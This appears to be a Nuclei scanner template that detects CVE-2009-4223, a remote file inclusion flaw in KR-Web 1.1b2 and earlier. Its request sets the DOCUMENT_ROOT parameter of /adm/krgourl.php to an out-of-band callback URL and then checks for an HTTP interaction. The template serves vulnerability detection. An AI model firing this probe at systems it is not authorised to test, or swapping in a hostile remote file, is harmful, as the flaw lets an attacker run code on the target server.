id: CVE-2009-4223 info: name: KR-Web <= 1.1b2 RFI author: geeknik severity: high description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents. reference: - https://sourceforge.net/projects/krw/ - https://www.exploit-db.com/exploits/10216 classification: cve-id: CVE-2009-4223 tags: cve,cve2009,krweb,rfi requests: - method: GET path: - "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}" matchers-condition: and matchers: - type: status status: - 200 - type: word part: interactsh_protocol words: - "http"